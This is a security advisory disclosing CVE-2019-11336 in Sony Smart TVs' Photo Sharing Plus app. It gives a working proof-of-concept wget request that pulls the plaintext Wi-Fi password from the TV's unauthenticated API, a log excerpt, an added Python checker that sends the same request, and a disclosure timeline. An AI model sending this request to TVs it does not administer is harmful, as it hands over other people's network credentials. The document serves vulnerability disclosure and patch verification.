Sony Smart TV Photo Sharing Plus Information Disclosure Vulnerability

23 April 2019

CVE

CVE-2019-11336

XID

XL-19-003

CVSS SCORE

6.5 (AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

AFFECTED VENDORS

Sony

AFFECTED SYSTEMS

Sony Smart TVs (non-exhaustive list):

KDL-50W800C, KDL-50W805C, KDL-50W807C, KDL-50W809C, KDL-50W820C, KDL-55W800C, KDL-55W805C, KDL-65W850C, KDL-65W855C, KDL-65W857C, KDL-75W850C, KDL-75W855C, XBR-43X830C, XBR-49X800C, XBR-49X830C, XBR-49X835C, XBR-49X837C, XBR-49X839C, XBR-55X805C, XBR-55X807C, XBR-55X809C, XBR-55X810C, XBR-55X850C, XBR-55X855C, XBR-55X857C, XBR-65X800C, XBR-65X805C, XBR-65X807C, XBR-65X809C, XBR-65X810C, XBR-65X850C, XBR-65X855C, XBR-65X857C, XBR-75X850C, XBR-75X855C, XBR-55X900C, XBR-55X905C, XBR-55X907C, XBR-65X900C, XBR-65X905C, XBR-65X907C, XBR-65X930C, XBR-75X910C, XBR-75X940C, XBR-75X945C, XBR-43X800D, XBR-49X800D, XBR-49X835D, XBR-55X850D, XBR-55X855D, XBR-55X857D, XBR-65X850D, XBR-65X855D, XBR-65X857D, XBR-75X850D, XBR-75X855D, XBR-75X857D, XBR-85X850D, XBR-85X855D, XBR-85X857D, XBR-55X930D, XBR-65X930D, XBR-65X935D, XBR-65X937D, XBR-75X940D, XBR-100Z9D, XBR-49X700D, XBR-55X700D, XBR-65X750D, XBR-65Z9D, XBR-75Z9D, XBR-43X800E, XBR-49X800E, XBR-49X900E, XBR-55A1E, XBR-55X800E, XBR-55X806E, XBR-55X900E, XBR-55X930E, XBR-65A1E, XBR-65X850E, XBR-65X900E, XBR-65X930E, XBR-75X850E, XBR-75X900E, XBR-75X940E, XBR-77A1E

 

VULNERABILITY SUMMARY

The “Photo Sharing Plus” application, which runs as part of the Smart TV functionality, is used to upload photos from a smartphone to the TV so that they can be displayed on the television screen. When the application is launched, it turns the TV into a Wi-Fi access point and displays the Wi-Fi password, which allows users to authenticate and share media content with the Sony Smart TV.

The vulnerability allows an unauthenticated attacker on the LAN/Wi-Fi to retrieve the static Wi-Fi password created by the television when the Photo Sharing Plus application is started.

TECHNICAL DETAILS

An unauthenticated remote attacker can retrieve the plaintext wireless password through the “Photo Sharing Plus” API.

PROOF OF CONCEPT

After starting the application, the following example retrieves the wireless password created by the TV (the IP of the TV is 192.168.1.102) over the LAN, without authentication:

root@kali:~# wget -qO- --post-data='{"id":80,"method":"getContentShareServerInfo" ,"params":[],"version":"1.0"}' http://[ip_tv]:10000/contentshare/

{"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1" ,"touchPadRemote":"notSupported"}],"id":80}

The password is 8362tbwX.

By reading the TV's logs, we can confirm that the password was delivered over HTTP, without authentication:

01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1" ,"touchPadRemote":"notSupported"}],"id":80}
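
Added example (not part of the xen1thLabs advisory or of Sony's code): a Python check that classifies a /contentshare/ reply, or a TV log line like the one above, as disclosing the Wi-Fi key, for confirming on a TV you administer that the fix has taken effect. The names assess, check_tv and scan_log are chosen here, and the second sample log line is constructed.

```python
import json
import re
import urllib.request

# Request, port and path exactly as in the advisory's proof of concept.
REQUEST = {"id": 80, "method": "getContentShareServerInfo", "params": [], "version": "1.0"}
NONE = {"ssid": None, "key_masked": None}

def assess(body):
    """Classify a /contentshare/ reply: does it disclose a Wi-Fi key?"""
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        return {"status": "unparseable", **NONE}
    results = doc.get("result") if isinstance(doc, dict) else None
    for entry in results if isinstance(results, list) else []:
        key = entry.get("key") if isinstance(entry, dict) else None
        if isinstance(key, str) and key:
            # Keep the secret out of reports: show only its first two characters.
            masked = key[:2] + "*" * (len(key) - 2)
            return {"status": "exposed", "ssid": entry.get("ssid"), "key_masked": masked}
    return {"status": "not_exposed", **NONE}

def check_tv(host, timeout=5.0):
    """Send the advisory's request to a TV you administer and classify the reply."""
    url = f"http://{host}:10000/contentshare/"
    try:
        with urllib.request.urlopen(url, data=json.dumps(REQUEST).encode(), timeout=timeout) as resp:
            return assess(resp.read().decode("utf-8", "replace"))
    except OSError:  # refused, timed out or HTTP error: the service is not answering
        return {"status": "unreachable", **NONE}

SEND_RE = re.compile(r"HttpEndPoint: send: (\{.*\})\s*$")

def scan_log(lines):
    """Return (line_number, assessment) for logged replies that carried a key."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = SEND_RE.search(line)
        verdict = assess(match.group(1)) if match else None
        if verdict and verdict["status"] == "exposed":
            hits.append((number, verdict))
    return hits

# First line is the log entry quoted in the advisory; the second is constructed.
SAMPLE_LOG = [
    r'01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1" ,"touchPadRemote":"notSupported"}],"id":80}',
    r'01-01 07:48:02.114 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"error":[403,"Forbidden"],"id":80}',
]
```

A result of "exposed" from check_tv after the update means the endpoint still hands out the key to unauthenticated clients; "unreachable" or "not_exposed" is the expected outcome once the service is terminated.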

TIMELINE

03/10/2018 – Vulnerability found

10/10/2018 - Report to Sony Bug bounty program through HackerOne

12/10/2018 - Confirmation of the reception of the bug report

15/10/2018 – xen1thLabs explains that the vulnerabilities are also exploitable over HbbTV (DVB-{S,T,C})

29/10/2018 - Sony confirms vulnerability

09/11/2018 - Sony confirms the patches will be available in March 2019 and asks xen1thLabs to wait until April 2019

29/11/2018 – xen1thLabs sent the slides prior to the xen1thLabs talk at HiTB Dubai 2018, as agreed with Sony

14/01/2019 - Updates requested from xen1thLabs

15/01/2019 - Sony informs xen1thLabs that they are working on patches

27/01/2019 - Updates requested from xen1thLabs

07/03/2019 - Updates requested from xen1thLabs

15/03/2019 – Sony informs xen1thLabs that the agreed date for disclosure is not possible because they don’t know when they will be ready: “maybe in a couple of months”

17/03/2019 – Updates requested from Sony in order to understand the situation and to publish a security advisory. xen1thLabs also officially requests a CVE

20/03/2019 – xen1thLabs asks for an acceptable timeline

21/03/2019 – Due to the lack of proper communication from Sony, xen1thLabs sent an email to Secure@Sony.com informing Sony that, in order to protect their customers, xen1thLabs needs to publish a security advisory

21/03/2019 – Automatic response stating that Secure@Sony.com is no longer in use

22/03/2019 – Sony is working on the patches and confirms the date of 12th April

26/03/2019 – xen1thLabs confirms the release date of the advisory and asks for a CVE

01/04/2019 – Sony confirms the vulnerabilities affect a range of models and “Sony plans to terminate Photo Sharing Plus service for all of models, and that completion date is scheduled for April 12th, 2019.”

16/04/2019 - Sony does not provide a CVE. Sony states "the wireless password recovery is within Sony's TV specification and is expected behavior and Sony will not be submitting for a CVE regarding this"

17/04/2019 - xen1thLabs requests a CVE from MITRE

23/04/2019 - Public disclosure

 

SOLUTION

Apply patches provided by Sony

Firmware update to v6.5830 from 01-22-2019 (including security patches?)

https://www.sony.com/electronics/support/downloads/00015771

Firmware update to v6.5830 from 01-22-2019 (not including security patches)

https://www.sony.com/electronics/support/downloads/00015770

End of Photo Sharing Plus 11/22/2018

https://www.sony.com/electronics/support/articles/00204331

CREDIT

xen1thLabs - Telecom Lab